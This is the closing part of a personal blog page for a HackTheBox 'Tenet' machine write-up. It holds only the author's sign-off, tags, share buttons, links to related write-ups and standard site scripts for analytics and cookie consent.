<p>I hope you guys have enjoyed this box resolution!</p>

<p>See you in the next post! <img class="emoji" title=":smiley:" alt=":smiley:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f603.png" height="20" width="20"></p>

        
      </section>

      <footer class="page__meta">
        
        
  


  
  
  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-tags" aria-hidden="true"></i> Tags: </strong>
    <span itemprop="keywords">
    
      
      
      <a href="/en-US/tag/#hackthebox" class="page__taxonomy-item" rel="tag">HackTheBox</a><span class="sep">, </span>
    
      
      
      <a href="/en-US/tag/#htb-linux" class="page__taxonomy-item" rel="tag">htb-linux</a><span class="sep">, </span>
    
      
      
      <a href="/en-US/tag/#htb-medium" class="page__taxonomy-item" rel="tag">htb-medium</a>
    
    </span>
  </p>




  


  
  
  

  <p class="page__taxonomy">
    <strong><i class="fas fa-fw fa-folder-open" aria-hidden="true"></i> Categories: </strong>
    <span itemprop="keywords">
    
      
      
      <a href="/en-US/categories/#writeup" class="page__taxonomy-item" rel="tag">Writeup</a>
    
    </span>
  </p>


        
  <p class="page__date"><strong><i class="fas fa-fw fa-calendar-alt" aria-hidden="true"></i> Updated:</strong> <time datetime="2021-06-12T13:00:00-03:00">June 12, 2021</time></p>


      </footer>

      <section id="sharelinks" class="page__share">
  
    <h4 class="page__share-title">Share on</h4>
  

  <a href="https://twitter.com/intent/tweet?via=zerahzurc&amp;text=Hackthebox+write-up%3A+Tenet%20https%3A%2F%2Fdavicruz.com%2Fwriteup%2F2021%2F06%2Fhtb-tenet%2F" class="btn btn--twitter" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Twitter"><i class="fab fa-fw fa-twitter" aria-hidden="true"></i><span> Twitter</span></a>

  <a href="https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fdavicruz.com%2Fwriteup%2F2021%2F06%2Fhtb-tenet%2F" class="btn btn--facebook" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Facebook"><i class="fab fa-fw fa-facebook" aria-hidden="true"></i><span> Facebook</span></a>

  <a href="https://www.linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fdavicruz.com%2Fwriteup%2F2021%2F06%2Fhtb-tenet%2F" class="btn btn--linkedin" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on LinkedIn"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i><span> LinkedIn</span></a>

  <a href="whatsapp://send?text=https%3A%2F%2Fdavicruz.com%2Fwriteup%2F2021%2F06%2Fhtb-tenet%2F" data-action="share/whatsapp/share" class="btn btn--whatsapp" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Whatsapp"><i class="fab fa-fw fa-whatsapp" aria-hidden="true"></i><span> Whatsapp</span></a>

  <a href="https://telegram.me/share/url?url=https%3A%2F%2Fdavicruz.com%2Fwriteup%2F2021%2F06%2Fhtb-tenet%2F&amp;text=Hackthebox+write-up%3A+Tenet" class="btn btn--telegram" onclick="window.open(this.href, 'window', 'left=20,top=20,width=500,height=500,toolbar=1,resizable=0'); return false;" title="Share on Telegram"><i class="fab fa-fw fa-telegram-plane" aria-hidden="true"></i><span> Telegram</span></a>


</section>


      
  <nav class="pagination">
    
    
      <a href="/en-US/writeup/2021/06/htb-scriptkiddie/" class="pagination--pager" title="Hackthebox write-up: ScriptKiddie
">Previous</a>
    
    
    
      <a href="#" class="pagination--pager disabled">Next</a>
    
  </nav>

    </div>

    
      <div class="page__comments">
  
  
      <h4 class="page__comments-title">Leave a comment</h4>
      <section id="utterances-comments"></section>
    
</div>

    
  </article>

  
  
    <div class="page__related">
      <h4 class="page__related-title">You may also enjoy</h4>
      <div class="grid__wrapper">
        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/wHnMfBz.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
      
      
      <a href="https://davicruz.com/en-US/writeup/2021/06/htb-scriptkiddie/" rel="permalink">Hackthebox write-up: ScriptKiddie
</a>
      
      
      
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        <time datetime="2021-06-05T13:00:00-03:00">June 5, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          4 minute read
        
      </span>
    


      <!-- Start Read in other languages-->
        <span class="page__meta-sep page__meta-lang"></span>
        
        
        
        <span class="page__meta-lang"><a href="/writeup/2021/06/htb-tenet/">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
        

        

        

        
        
        
        
      <!-- End Read in other languages-->
      <span class="page__meta-sep page__meta-share"></span>
      <span class="page__meta-share">
        <i class="fas fa-share-alt" aria-hidden="true"></i>
        <a href="#sharelinks">Share</a>
      </span>
  </p>


    <p class="archive__item-excerpt" itemprop="description">Hello guys!

This week’s machine will be ScriptKiddie, another easy-rated Linux box from Hack The Box, created by 0xdf.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/FTjLM76.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
      
      
      <a href="https://davicruz.com/en-US/writeup/2021/05/htb-delivery/" rel="permalink">Hackthebox write-up: Delivery
</a>
      
      
      
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        <time datetime="2021-05-22T13:00:00-03:00">May 22, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          7 minute read
        
      </span>
    


      <!-- Start Read in other languages-->
        <span class="page__meta-sep page__meta-lang"></span>
        
        
        
        <span class="page__meta-lang"><a href="/writeup/2021/06/htb-tenet/">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
        

        

        

        
        
        
        
      <!-- End Read in other languages-->
      <span class="page__meta-sep page__meta-share"></span>
      <span class="page__meta-share">
        <i class="fas fa-share-alt" aria-hidden="true"></i>
        <a href="#sharelinks">Share</a>
      </span>
  </p>


    <p class="archive__item-excerpt" itemprop="description">Hello guys!

This week’s machine will be Delivery, another easy-rated machine from Hack The Box, created by ippsec.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/R2EVM1J.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
      
      
      <a href="https://davicruz.com/en-US/writeup/2021/05/htb-ready/" rel="permalink">Hackthebox write-up: Ready
</a>
      
      
      
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        <time datetime="2021-05-15T13:00:00-03:00">May 15, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          6 minute read
        
      </span>
    


      <!-- Start Read in other languages-->
        <span class="page__meta-sep page__meta-lang"></span>
        
        
        
        <span class="page__meta-lang"><a href="/writeup/2021/06/htb-tenet/">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
        

        

        

        
        
        
        
      <!-- End Read in other languages-->
      <span class="page__meta-sep page__meta-share"></span>
      <span class="page__meta-share">
        <i class="fas fa-share-alt" aria-hidden="true"></i>
        <a href="#sharelinks">Share</a>
      </span>
  </p>


    <p class="archive__item-excerpt" itemprop="description">Hello guys!

This week’s machine will be Ready, another median-rated machine from Hack The Box, created by bertolis.
</p>
  </article>
</div>

        
          



<div class="grid__item">
  <article class="archive__item" itemscope itemtype="https://schema.org/CreativeWork">
    
      <div class="archive__item-teaser">
        <img src="https://i.imgur.com/m7oESPT.png" alt="">
      </div>
    
    <h2 class="archive__item-title no_toc" itemprop="headline">
      
      
      
      <a href="https://davicruz.com/en-US/writeup/2021/04/htb-bucket/" rel="permalink">Hackthebox write-up: Bucket
</a>
      
      
      
    </h2>
    

  <p class="page__meta">
    
      
      <span class="page__meta-date">
        <i class="far fa-fw fa-calendar-alt" aria-hidden="true"></i>
        <time datetime="2021-04-24T09:00:00-03:00">April 24, 2021</time>
      </span>
    

    <span class="page__meta-sep"></span>

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-fw fa-clock" aria-hidden="true"></i>
        
          12 minute read
        
      </span>
    


      <!-- Start Read in other languages-->
        <span class="page__meta-sep page__meta-lang"></span>
        
        
        
        <span class="page__meta-lang"><a href="/writeup/2021/06/htb-tenet/">Leia também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></span>
        

        

        

        
        
        
        
      <!-- End Read in other languages-->
      <span class="page__meta-sep page__meta-share"></span>
      <span class="page__meta-share">
        <i class="fas fa-share-alt" aria-hidden="true"></i>
        <a href="#sharelinks">Share</a>
      </span>
  </p>


    <p class="archive__item-excerpt" itemprop="description">Hello guys!

This week’s machine will be Bucket, another median-rated machine from Hack The Box, created by MrR3boot.
</p>
  </article>
</div>

        
      </div>
    </div>
  
  
</div>

    </div>

    
      <div class="search-content">
        <div class="search-content__inner-wrap">
<form class="search-content__form" onkeydown="return event.key != 'Enter';">
    <label class="sr-only" for="search">
      Enter your search term...
    </label>
    <input type="search" id="search" class="search-input" tabindex="-1" placeholder="Enter your search term...">
  </form>
  <div id="results" class="results"></div>
</div>

      </div>
    

    <div id="footer" class="page__footer">
      <footer>
        <!-- start custom footer snippets -->

<!-- Osano - consent -->
<script src="https://cdn.jsdelivr.net/npm/cookieconsent@3/build/cookieconsent.min.js" data-cfasync="false"></script>

<!-- end custom footer snippets -->
        <div class="page__footer-follow">
  <ul class="social-icons">

    
    <li><strong>Follow:</strong></li>
    

    
    
    
    <li><a href="https://www.linkedin.com/in/davicruz" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-linkedin" aria-hidden="true"></i> Linkedin</a></li>
    
    
    
    <li><a href="https://twitter.com/zerahzurc" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-twitter-square" aria-hidden="true"></i> Twitter</a></li>
    
    
    
    <li><a href="https://github.com/davi-cruz" rel="nofollow noopener noreferrer"><i class="fab fa-fw fa-github" aria-hidden="true"></i> GitHub</a></li>
    
    
    
    <!-- Terms and Privacy -->
    <li><a href="https://davicruz.com/en-US/terms-and-privacy/" rel="nofollow noopener noreferrer">
        <i class="fas fa-user-shield" aria-hidden="true"></i> Terms of Service and Privacy Policy</a></li>
    <!-- end Terms and Privacy -->
    <li><a href="/feed.xml"><i class="fas fa-fw fa-rss-square" aria-hidden="true"></i> Feed</a></li>
  </ul>
</div>

<!-- Start Read in other languages-->
<div class="page__footer-follow">
  <ul>
    
    
    
    <li><a href="https://davicruz.com">Disponível também em  <img class="emoji" title=":brazil:" alt=":brazil:" src="https://github.githubassets.com/images/icons/emoji/unicode/1f1e7-1f1f7.png" height="20" width="20"></a></li>
    

    

    

      
      
    
      
  </ul>
</div>
<!-- End Read in other languages-->

<div class="page__footer-copyright">© 2021 Davi Cruz. Powered by <a href="https://jekyllrb.com" rel="nofollow">Jekyll</a> &amp; <a href="https://mademistakes.com/work/minimal-mistakes-jekyll-theme/" rel="nofollow">Minimal Mistakes</a>.</div>

      </footer>
    </div>

    
  <script src="/assets/js/main.min.js"></script>




<script src="/assets/js/lunr/lunr.min.js"></script>
<script src="/assets/js/lunr/lunr-store.js"></script>
<script src="/assets/js/lunr/lunr-en.js"></script>




  <!-- start custom analytics snippet -->

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-54883666-1"></script>
<script>
  function EnableGTAGonConsent(){
    window.dataLayer = window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());
    gtag('config', 'UA-54883666-1', { 'anonymize_ip': true});
  }
</script>

<!-- Microsoft Clarity -->
<script type="text/javascript">
  function EnableMSClarityonConsent(){
    (function(c,l,a,r,i,t,y){
      c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
      t=l.createElement(r);t.async=1;t.src="https://www.clarity.ms/tag/"+i;
      y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
  })(window, document, "clarity", "script", "5dnbfjo108");
  }
</script>

<!-- end custom analytics snippet -->





    <script>
  'use strict';

  (function() {
    var commentContainer = document.querySelector('#utterances-comments');

    if (!commentContainer) {
      return;
    }

    var script = document.createElement('script');
    script.setAttribute('src', 'https://utteranc.es/client.js');
    script.setAttribute('repo', 'davi-cruz/davi-cruz.github.io');
    script.setAttribute('issue-term', 'htb-tenet');
    script.setAttribute('theme', 'github-dark');
    script.setAttribute('crossorigin', 'anonymous');

    commentContainer.appendChild(script);
  })();
</script>

  




    
<!-- Cookie Consent Management -->
<script>
    var strMessage = "This website uses cookies to ensure you get the best experience";
    var strDismiss = "Got it!";
    var strAllow = "Allow cookies";
    var strDeny = "No, thanks!";
    var strLink = "Learn More";
    var strHref = "https://davicruz.com/en-US/terms-and-privacy/";

    window.cookieconsent.initialise({
        "palette": {
            "popup": {
                "background": "#252e39"
            },
            "button": {
                "background": "transparent",
                "text": "#008288",
                "border": "#008288"
            }
        },
        "position": "bottom-left",
        "type": "opt-in",
        "content": {
            "message": strMessage,
            "dismiss": strDismiss,
            "allow": strAllow,
            "deny": strDeny,
            "link": strLink,
            "href": strHref
        },
        onInitialise: function (status) {
            var type = this.options.type;
            var didConsent = this.hasConsented();
            if (type == 'opt-in' && didConsent) {
                // enable cookies
                EnableMSClarityonConsent();
                EnableGTAGonConsent();
            }
            if (type == 'opt-out' && !didConsent) {
                // disable cookies
            }
        },
        onStatusChange: function (status, chosenBefore) {
            var type = this.options.type;
            var didConsent = this.hasConsented();
            if (type == 'opt-in' && didConsent) {
                // enable cookies
                EnableMSClarityonConsent();
                EnableGTAGonConsent();
            }
            if (type == 'opt-out' && !didConsent) {
                // disable cookies
            }
        },
        onRevokeChoice: function () {
            var type = this.options.type;
            if (type == 'opt-in') {
                // disable cookies
            }
            if (type == 'opt-out') {
                // enable cookies
                EnableMSClarityonConsent();
                EnableGTAGonConsent();
            }
        }
    });
</script>
<!-- End of Cookie Consent Management -->

  </body>
</html>
